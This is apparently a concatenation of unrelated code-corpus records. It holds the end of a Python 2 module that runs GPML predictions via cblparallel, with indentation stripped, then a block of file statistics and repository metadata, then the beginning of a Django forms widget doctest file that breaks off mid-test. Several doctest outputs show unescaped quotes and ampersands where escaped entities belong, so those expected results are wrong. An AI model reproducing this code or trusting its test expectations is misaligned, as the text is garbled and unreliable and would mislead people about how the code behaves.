'inference': model.likelihood.gpml_inference_method,
'iters': str(30),
'seed': str(random_seed)}
code = gpml.PREDICT_AND_SAVE_CODE % parameters
code = re.sub('% ', '%% ', code) # HACK - cblparallel currently does not like % signs
# Evaluate code - potentially on cluster
if local_computation:
temp_results_file = cblparallel.run_batch_locally([code], language='matlab', max_cpu=1.1, max_mem=1.1, verbose=verbose)[0]
else:
temp_results_file = cblparallel.run_batch_on_fear([code], language='matlab', max_jobs=max_jobs, verbose=verbose)[0]
results = scipy.io.loadmat(temp_results_file)
# Remove temporary files (perhaps on the cluster server)
cblparallel.remove_temp_file(temp_results_file, local_computation)
cblparallel.remove_temp_file(data_file, local_computation)
# Return dictionary of MATLAB results
return results
"""
The function my_make_predictions can make predictions on multiple time series.
@author : Heechan Lee (lhc101020@unist.ac.kr, SAIL lab)
"""
def my_make_predictions(X, y, Xtest, ytest, model, local_computation=False, max_jobs=500, verbose=True, random_seed=0, no_noise=False, best_depth=0, txt_filename=''):
# Make data into matrices in case they're unidimensional.
if X.ndim == 1: X = X[:, nax]
if y.ndim == 1: y = y[:, nax]
ndata = y.shape[0]
# Save temporary data file in standard temporary directory
data_file = cblparallel.create_temp_file('.mat')
scipy.io.savemat(data_file, {'X': X, 'y': y, 'Xtest' : Xtest, 'ytest' : ytest})
# Copy onto cluster server if necessary
if not local_computation:
if verbose:
print 'Moving data file to fear'
cblparallel.copy_to_remote(data_file)
# Create prediction code
parameters ={'datafile': data_file.split('/')[-1],
'writefile': '%(output_file)s',
'params_file' : txt_filename+'lvl_'+str(best_depth)+'_0.mat1.mat',
'gpml_path': cblparallel.gpml_path(local_computation),
'kernel_syntax': model.kernel.get_gpml_expression(dimensions=X.shape[1])
#'kernel_params': '[ %s ]' % ' '.join(str(p) for p in model.kernel.param_vector),
#'inference': model.likelihood.gpml_inference_method,
#'iters': str(30),
#'seed': str(random_seed)
}
code = gpml.MATLAB_SKL_PRED_CODE % parameters
code = re.sub('% ', '%% ', code) # HACK - cblparallel currently does not like % signs
# Evaluate code - potentially on cluster
if local_computation:
temp_results_file = cblparallel.run_batch_locally([code], language='matlab', max_cpu=1.1, max_mem=1.1, verbose=verbose)[0]
else:
temp_results_file = cblparallel.run_batch_on_fear([code], language='matlab', max_jobs=max_jobs, verbose=verbose)[0]
results = scipy.io.loadmat(temp_results_file)
# Remove temporary files (perhaps on the cluster server)
cblparallel.remove_temp_file(temp_results_file, local_computation)
cblparallel.remove_temp_file(data_file, local_computation)
# Return dictionary of MATLAB results
return results
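# Illustrative sketch (not part of the original module): a minimal caller for
# evaluate_models(), assuming `models` is a list of GPModel objects constructed
# elsewhere and that MATLAB/GPML and cblparallel are set up as config.py expects.
#
# import numpy as np
# X = np.linspace(0, 10, 200)[:, np.newaxis]
# y = np.sin(X) + 0.1 * np.random.randn(200, 1)
# results = evaluate_models(models, X, y, iters=100, local_computation=True)
# for scored_model in results:
#     print scored_model  # Python 2 print statement, matching this module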
| 46.382353
| 193
| 0.638713
| 1,660
| 12,616
| 4.678916
| 0.151205
| 0.03296
| 0.025235
| 0.034762
| 0.885284
| 0.885284
| 0.885284
| 0.879748
| 0.879748
| 0.879748
| 0
| 0.012075
| 0.245086
| 12,616
| 271
| 194
| 46.553506
| 0.803444
| 0.192613
| 0
| 0.735632
| 0
| 0.005747
| 0.108921
| 0
| 0
| 0
| 0
| 0.00369
| 0
| 0
| null | null | 0
| 0.114943
| null | null | 0.086207
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
40c4d017932414573c9723aa3913426d61d7e0fe
| 48,906
|
py
|
Python
|
tests/regressiontests/forms/widgets.py
|
hugs/django
|
3690ab217e3a65d01bd2f9d25f05fb2e54815693
|
[
"BSD-3-Clause"
] | 2
|
2015-12-04T12:05:26.000Z
|
2016-05-08T11:26:55.000Z
|
tests/regressiontests/forms/widgets.py
|
hugs/django
|
3690ab217e3a65d01bd2f9d25f05fb2e54815693
|
[
"BSD-3-Clause"
] | null | null | null |
tests/regressiontests/forms/widgets.py
|
hugs/django
|
3690ab217e3a65d01bd2f9d25f05fb2e54815693
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
tests = r"""
>>> from django.forms import *
>>> from django.forms.widgets import RadioFieldRenderer
>>> from django.utils.safestring import mark_safe
>>> import datetime
>>> import time
>>> import re
>>> try:
... from decimal import Decimal
... except ImportError:
... from django.utils._decimal import Decimal
###########
# Widgets #
###########
Each Widget class corresponds to an HTML form widget. A Widget knows how to
render itself, given a field name and some data. Widgets don't perform
validation.
# TextInput Widget ############################################################
>>> w = TextInput()
>>> w.render('email', '')
u'<input type="text" name="email" />'
>>> w.render('email', None)
u'<input type="text" name="email" />'
>>> w.render('email', 'test@example.com')
u'<input type="text" name="email" value="test@example.com" />'
>>> w.render('email', 'some "quoted" & ampersanded value')
u'<input type="text" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', 'test@example.com', attrs={'class': 'fun'})
u'<input type="text" name="email" value="test@example.com" class="fun" />'
# Note that doctest in Python 2.4 (and maybe 2.5?) doesn't support non-ascii
# characters in output, so we're displaying the repr() here.
>>> w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<input type="text" name="email" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = TextInput(attrs={'class': 'fun'})
>>> w.render('email', '')
u'<input type="text" class="fun" name="email" />'
>>> w.render('email', 'foo@example.com')
u'<input type="text" class="fun" value="foo@example.com" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = TextInput(attrs={'class': 'pretty'})
>>> w.render('email', '', attrs={'class': 'special'})
u'<input type="text" class="special" name="email" />'
# PasswordInput Widget ############################################################
>>> w = PasswordInput()
>>> w.render('email', '')
u'<input type="password" name="email" />'
>>> w.render('email', None)
u'<input type="password" name="email" />'
>>> w.render('email', 'test@example.com')
u'<input type="password" name="email" value="test@example.com" />'
>>> w.render('email', 'some "quoted" & ampersanded value')
u'<input type="password" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', 'test@example.com', attrs={'class': 'fun'})
u'<input type="password" name="email" value="test@example.com" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = PasswordInput(attrs={'class': 'fun'})
>>> w.render('email', '')
u'<input type="password" class="fun" name="email" />'
>>> w.render('email', 'foo@example.com')
u'<input type="password" class="fun" value="foo@example.com" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = PasswordInput(attrs={'class': 'pretty'})
>>> w.render('email', '', attrs={'class': 'special'})
u'<input type="password" class="special" name="email" />'
>>> w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<input type="password" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />'
The render_value argument lets you specify whether the widget should render
its value. You may want to do this for security reasons.
>>> w = PasswordInput(render_value=True)
>>> w.render('email', 'secret')
u'<input type="password" name="email" value="secret" />'
>>> w = PasswordInput(render_value=False)
>>> w.render('email', '')
u'<input type="password" name="email" />'
>>> w.render('email', None)
u'<input type="password" name="email" />'
>>> w.render('email', 'secret')
u'<input type="password" name="email" />'
>>> w = PasswordInput(attrs={'class': 'fun'}, render_value=False)
>>> w.render('email', 'secret')
u'<input type="password" class="fun" name="email" />'
# HiddenInput Widget ############################################################
>>> w = HiddenInput()
>>> w.render('email', '')
u'<input type="hidden" name="email" />'
>>> w.render('email', None)
u'<input type="hidden" name="email" />'
>>> w.render('email', 'test@example.com')
u'<input type="hidden" name="email" value="test@example.com" />'
>>> w.render('email', 'some "quoted" & ampersanded value')
u'<input type="hidden" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', 'test@example.com', attrs={'class': 'fun'})
u'<input type="hidden" name="email" value="test@example.com" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = HiddenInput(attrs={'class': 'fun'})
>>> w.render('email', '')
u'<input type="hidden" class="fun" name="email" />'
>>> w.render('email', 'foo@example.com')
u'<input type="hidden" class="fun" value="foo@example.com" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = HiddenInput(attrs={'class': 'pretty'})
>>> w.render('email', '', attrs={'class': 'special'})
u'<input type="hidden" class="special" name="email" />'
>>> w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<input type="hidden" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = HiddenInput(attrs={'class': 'pretty'})
>>> w.render('email', '', attrs={'class': 'special'})
u'<input type="hidden" class="special" name="email" />'
Boolean values are rendered to their string forms ("True" and "False").
>>> w = HiddenInput()
>>> w.render('get_spam', False)
u'<input type="hidden" name="get_spam" value="False" />'
>>> w.render('get_spam', True)
u'<input type="hidden" name="get_spam" value="True" />'
# MultipleHiddenInput Widget ##################################################
>>> w = MultipleHiddenInput()
>>> w.render('email', [])
u''
>>> w.render('email', None)
u''
>>> w.render('email', ['test@example.com'])
u'<input type="hidden" name="email" value="test@example.com" />'
>>> w.render('email', ['some "quoted" & ampersanded value'])
u'<input type="hidden" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', ['test@example.com', 'foo@example.com'])
u'<input type="hidden" name="email" value="test@example.com" />\n<input type="hidden" name="email" value="foo@example.com" />'
>>> w.render('email', ['test@example.com'], attrs={'class': 'fun'})
u'<input type="hidden" name="email" value="test@example.com" class="fun" />'
>>> w.render('email', ['test@example.com', 'foo@example.com'], attrs={'class': 'fun'})
u'<input type="hidden" name="email" value="test@example.com" class="fun" />\n<input type="hidden" name="email" value="foo@example.com" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = MultipleHiddenInput(attrs={'class': 'fun'})
>>> w.render('email', [])
u''
>>> w.render('email', ['foo@example.com'])
u'<input type="hidden" class="fun" value="foo@example.com" name="email" />'
>>> w.render('email', ['foo@example.com', 'test@example.com'])
u'<input type="hidden" class="fun" value="foo@example.com" name="email" />\n<input type="hidden" class="fun" value="test@example.com" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = MultipleHiddenInput(attrs={'class': 'pretty'})
>>> w.render('email', ['foo@example.com'], attrs={'class': 'special'})
u'<input type="hidden" class="special" value="foo@example.com" name="email" />'
>>> w.render('email', ['ŠĐĆŽćžšđ'], attrs={'class': 'fun'})
u'<input type="hidden" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = MultipleHiddenInput(attrs={'class': 'pretty'})
>>> w.render('email', ['foo@example.com'], attrs={'class': 'special'})
u'<input type="hidden" class="special" value="foo@example.com" name="email" />'
# FileInput Widget ############################################################
FileInput widgets don't ever show the value, because the old value is of no use
if you are updating the form or if the provided file generated an error.
>>> w = FileInput()
>>> w.render('email', '')
u'<input type="file" name="email" />'
>>> w.render('email', None)
u'<input type="file" name="email" />'
>>> w.render('email', 'test@example.com')
u'<input type="file" name="email" />'
>>> w.render('email', 'some "quoted" & ampersanded value')
u'<input type="file" name="email" />'
>>> w.render('email', 'test@example.com', attrs={'class': 'fun'})
u'<input type="file" name="email" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = FileInput(attrs={'class': 'fun'})
>>> w.render('email', '')
u'<input type="file" class="fun" name="email" />'
>>> w.render('email', 'foo@example.com')
u'<input type="file" class="fun" name="email" />'
>>> w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<input type="file" class="fun" name="email" />'
Test for the behavior of _has_changed for FileInput. The value of data will
more than likely come from request.FILES. The value of initial data will
likely be a filename stored in the database. Since its value is of no use to
a FileInput it is ignored.
>>> w = FileInput()
# No file was uploaded and no initial data.
>>> w._has_changed(u'', None)
False
# A file was uploaded and no initial data.
>>> w._has_changed(u'', {'filename': 'resume.txt', 'content': 'My resume'})
True
# A file was not uploaded, but there is initial data
>>> w._has_changed(u'resume.txt', None)
False
# A file was uploaded and there is initial data (file identity is not dealt
# with here)
>>> w._has_changed('resume.txt', {'filename': 'resume.txt', 'content': 'My resume'})
True
# Textarea Widget #############################################################
>>> w = Textarea()
>>> w.render('msg', '')
u'<textarea rows="10" cols="40" name="msg"></textarea>'
>>> w.render('msg', None)
u'<textarea rows="10" cols="40" name="msg"></textarea>'
>>> w.render('msg', 'value')
u'<textarea rows="10" cols="40" name="msg">value</textarea>'
>>> w.render('msg', 'some "quoted" & ampersanded value')
u'<textarea rows="10" cols="40" name="msg">some "quoted" & ampersanded value</textarea>'
>>> w.render('msg', mark_safe('pre "quoted" value'))
u'<textarea rows="10" cols="40" name="msg">pre "quoted" value</textarea>'
>>> w.render('msg', 'value', attrs={'class': 'pretty', 'rows': 20})
u'<textarea class="pretty" rows="20" cols="40" name="msg">value</textarea>'
You can also pass 'attrs' to the constructor:
>>> w = Textarea(attrs={'class': 'pretty'})
>>> w.render('msg', '')
u'<textarea rows="10" cols="40" name="msg" class="pretty"></textarea>'
>>> w.render('msg', 'example')
u'<textarea rows="10" cols="40" name="msg" class="pretty">example</textarea>'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = Textarea(attrs={'class': 'pretty'})
>>> w.render('msg', '', attrs={'class': 'special'})
u'<textarea rows="10" cols="40" name="msg" class="special"></textarea>'
>>> w.render('msg', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<textarea rows="10" cols="40" name="msg" class="fun">\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111</textarea>'
# CheckboxInput Widget ########################################################
>>> w = CheckboxInput()
>>> w.render('is_cool', '')
u'<input type="checkbox" name="is_cool" />'
>>> w.render('is_cool', None)
u'<input type="checkbox" name="is_cool" />'
>>> w.render('is_cool', False)
u'<input type="checkbox" name="is_cool" />'
>>> w.render('is_cool', True)
u'<input checked="checked" type="checkbox" name="is_cool" />'
Using any value that's not in ('', None, False, True) will check the checkbox
and set the 'value' attribute.
>>> w.render('is_cool', 'foo')
u'<input checked="checked" type="checkbox" name="is_cool" value="foo" />'
>>> w.render('is_cool', False, attrs={'class': 'pretty'})
u'<input type="checkbox" name="is_cool" class="pretty" />'
You can also pass 'attrs' to the constructor:
>>> w = CheckboxInput(attrs={'class': 'pretty'})
>>> w.render('is_cool', '')
u'<input type="checkbox" class="pretty" name="is_cool" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = CheckboxInput(attrs={'class': 'pretty'})
>>> w.render('is_cool', '', attrs={'class': 'special'})
u'<input type="checkbox" class="special" name="is_cool" />'
You can pass 'check_test' to the constructor. This is a callable that takes the
value and returns True if the box should be checked.
>>> w = CheckboxInput(check_test=lambda value: value.startswith('hello'))
>>> w.render('greeting', '')
u'<input type="checkbox" name="greeting" />'
>>> w.render('greeting', 'hello')
u'<input checked="checked" type="checkbox" name="greeting" value="hello" />'
>>> w.render('greeting', 'hello there')
u'<input checked="checked" type="checkbox" name="greeting" value="hello there" />'
>>> w.render('greeting', 'hello & goodbye')
u'<input checked="checked" type="checkbox" name="greeting" value="hello & goodbye" />'
A subtlety: If the 'check_test' argument cannot handle a value and raises any
exception during its __call__, then the exception will be swallowed and the box
will not be checked. In this example, the 'check_test' assumes the value has a
startswith() method, which fails for the values True, False and None.
>>> w.render('greeting', True)
u'<input type="checkbox" name="greeting" />'
>>> w.render('greeting', False)
u'<input type="checkbox" name="greeting" />'
>>> w.render('greeting', None)
u'<input type="checkbox" name="greeting" />'
The CheckboxInput widget will return False if the key is not found in the data
dictionary (because HTML form submission doesn't send any result for unchecked
checkboxes).
>>> w.value_from_datadict({}, {}, 'testing')
False
>>> w._has_changed(None, None)
False
>>> w._has_changed(None, u'')
False
>>> w._has_changed(u'', None)
False
>>> w._has_changed(u'', u'')
False
>>> w._has_changed(False, u'on')
True
>>> w._has_changed(True, u'on')
False
>>> w._has_changed(True, u'')
True
# Select Widget ###############################################################
>>> w = Select()
>>> print w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select name="beatle">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
If the value is None, none of the options are selected:
>>> print w.render('beatle', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select name="beatle">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
If the value corresponds to a label (but not to an option value), none of the options are selected:
>>> print w.render('beatle', 'John', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select name="beatle">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
The value is compared to its str():
>>> print w.render('num', 2, choices=[('1', '1'), ('2', '2'), ('3', '3')])
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
>>> print w.render('num', '2', choices=[(1, 1), (2, 2), (3, 3)])
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
>>> print w.render('num', 2, choices=[(1, 1), (2, 2), (3, 3)])
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
The 'choices' argument can be any iterable:
>>> from itertools import chain
>>> def get_choices():
... for i in range(5):
... yield (i, i)
>>> print w.render('num', 2, choices=get_choices())
<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>
>>> things = ({'id': 1, 'name': 'And Boom'}, {'id': 2, 'name': 'One More Thing!'})
>>> class SomeForm(Form):
... somechoice = ChoiceField(choices=chain((('', '-'*9),), [(thing['id'], thing['name']) for thing in things]))
>>> f = SomeForm()
>>> f.as_table()
u'<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="" selected="selected">---------</option>\n<option value="1">And Boom</option>\n<option value="2">One More Thing!</option>\n</select></td></tr>'
>>> f.as_table()
u'<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="" selected="selected">---------</option>\n<option value="1">And Boom</option>\n<option value="2">One More Thing!</option>\n</select></td></tr>'
>>> f = SomeForm({'somechoice': 2})
>>> f.as_table()
u'<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="">---------</option>\n<option value="1">And Boom</option>\n<option value="2" selected="selected">One More Thing!</option>\n</select></td></tr>'
You can also pass 'choices' to the constructor:
>>> w = Select(choices=[(1, 1), (2, 2), (3, 3)])
>>> print w.render('num', 2)
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
>>> print w.render('num', 2, choices=[(4, 4), (5, 5)])
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select>
# Choices are escaped correctly
>>> print w.render('escape', None, choices=(('bad', 'you & me'), ('good', mark_safe('you > me'))))
<select name="escape">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="bad">you & me</option>
<option value="good">you > me</option>
</select>
# Unicode choices are correctly rendered as HTML
>>> w.render('email', 'ŠĐĆŽćžšđ', choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')])
u'<select name="email">\n<option value="1">1</option>\n<option value="2">2</option>\n<option value="3">3</option>\n<option value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" selected="selected">\u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</option>\n<option value="\u0107\u017e\u0161\u0111">abc\u0107\u017e\u0161\u0111</option>\n</select>'
If choices is passed to the constructor and is a generator, it can be iterated
over multiple times without getting consumed:
>>> w = Select(choices=get_choices())
>>> print w.render('num', 2)
<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>
>>> print w.render('num', 3)
<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3" selected="selected">3</option>
<option value="4">4</option>
</select>
Choices can be nested one level in order to create HTML optgroups:
>>> w.choices=(('outer1', 'Outer 1'), ('Group "1"', (('inner1', 'Inner 1'), ('inner2', 'Inner 2'))))
>>> print w.render('nestchoice', None)
<select name="nestchoice">
<option value="outer1">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>
>>> print w.render('nestchoice', 'outer1')
<select name="nestchoice">
<option value="outer1" selected="selected">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>
>>> print w.render('nestchoice', 'inner1')
<select name="nestchoice">
<option value="outer1">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1" selected="selected">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>
# NullBooleanSelect Widget ####################################################
>>> w = NullBooleanSelect()
>>> print w.render('is_cool', True)
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2" selected="selected">Yes</option>
<option value="3">No</option>
</select>
>>> print w.render('is_cool', False)
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2">Yes</option>
<option value="3" selected="selected">No</option>
</select>
>>> print w.render('is_cool', None)
<select name="is_cool">
<option value="1" selected="selected">Unknown</option>
<option value="2">Yes</option>
<option value="3">No</option>
</select>
>>> print w.render('is_cool', '2')
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2" selected="selected">Yes</option>
<option value="3">No</option>
</select>
>>> print w.render('is_cool', '3')
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2">Yes</option>
<option value="3" selected="selected">No</option>
</select>
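The widget also maps submitted data back to Python booleans; a minimal sketch of
value_from_datadict, assuming the '2'/'3' coding shown above:
>>> w.value_from_datadict({'is_cool': u'2'}, {}, 'is_cool')
True
>>> w.value_from_datadict({'is_cool': u'3'}, {}, 'is_cool')
False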
""" + \
r""" # [This concatenation is to keep the string below the jython's 32K limit].
# SelectMultiple Widget #######################################################
>>> w = SelectMultiple()
>>> print w.render('beatles', ['J'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
>>> print w.render('beatles', ['J', 'P'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
>>> print w.render('beatles', ['J', 'P', 'R'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R" selected="selected">Ringo</option>
</select>
If the value is None, none of the options are selected:
>>> print w.render('beatles', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
If the value corresponds to a label (but not to an option value), none of the options are selected:
>>> print w.render('beatles', ['John'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
If multiple values are given, but some of them are not valid, the valid ones are selected:
>>> print w.render('beatles', ['J', 'G', 'foo'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G" selected="selected">George</option>
<option value="R">Ringo</option>
</select>
The value is compared to its str():
>>> print w.render('nums', [2], choices=[('1', '1'), ('2', '2'), ('3', '3')])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
>>> print w.render('nums', ['2'], choices=[(1, 1), (2, 2), (3, 3)])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
>>> print w.render('nums', [2], choices=[(1, 1), (2, 2), (3, 3)])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
The 'choices' argument can be any iterable:
>>> def get_choices():
...     for i in range(5):
...         yield (i, i)
>>> print w.render('nums', [2], choices=get_choices())
<select multiple="multiple" name="nums">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>
You can also pass 'choices' to the constructor:
>>> w = SelectMultiple(choices=[(1, 1), (2, 2), (3, 3)])
>>> print w.render('nums', [2])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
>>> print w.render('nums', [2], choices=[(4, 4), (5, 5)])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select>
# Choices are escaped correctly
>>> print w.render('escape', None, choices=(('bad', 'you & me'), ('good', mark_safe('you > me'))))
<select multiple="multiple" name="escape">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="bad">you & me</option>
<option value="good">you > me</option>
</select>
# Unicode choices are correctly rendered as HTML
>>> w.render('nums', ['ŠĐĆŽćžšđ'], choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')])
u'<select multiple="multiple" name="nums">\n<option value="1">1</option>\n<option value="2">2</option>\n<option value="3">3</option>\n<option value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" selected="selected">\u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</option>\n<option value="\u0107\u017e\u0161\u0111">abc\u0107\u017e\u0161\u0111</option>\n</select>'
# Test the usage of _has_changed
>>> w._has_changed(None, None)
False
>>> w._has_changed([], None)
False
>>> w._has_changed(None, [u'1'])
True
>>> w._has_changed([1, 2], [u'1', u'2'])
False
>>> w._has_changed([1, 2], [u'1'])
True
>>> w._has_changed([1, 2], [u'1', u'3'])
True
# Choices can be nested one level in order to create HTML optgroups:
>>> w.choices = (('outer1', 'Outer 1'), ('Group "1"', (('inner1', 'Inner 1'), ('inner2', 'Inner 2'))))
>>> print w.render('nestchoice', None)
<select multiple="multiple" name="nestchoice">
<option value="outer1">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>
>>> print w.render('nestchoice', ['outer1'])
<select multiple="multiple" name="nestchoice">
<option value="outer1" selected="selected">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>
>>> print w.render('nestchoice', ['inner1'])
<select multiple="multiple" name="nestchoice">
<option value="outer1">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1" selected="selected">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>
>>> print w.render('nestchoice', ['outer1', 'inner2'])
<select multiple="multiple" name="nestchoice">
<option value="outer1" selected="selected">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1">Inner 1</option>
<option value="inner2" selected="selected">Inner 2</option>
</optgroup>
</select>
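When the submitted data is a multi-valued dict such as a QueryDict, every value sent
for the field is collected; a minimal sketch (the QueryDict import is assumed here and
is not used elsewhere in these tests):
>>> from django.http import QueryDict
>>> w.value_from_datadict(QueryDict('beatles=J&beatles=P'), {}, 'beatles')
[u'J', u'P']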
# RadioSelect Widget ##########################################################
>>> w = RadioSelect()
>>> print w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>
If the value is None, none of the options are checked:
>>> print w.render('beatle', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>
If the value corresponds to a label (but not to an option value), none of the options are checked:
>>> print w.render('beatle', 'John', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
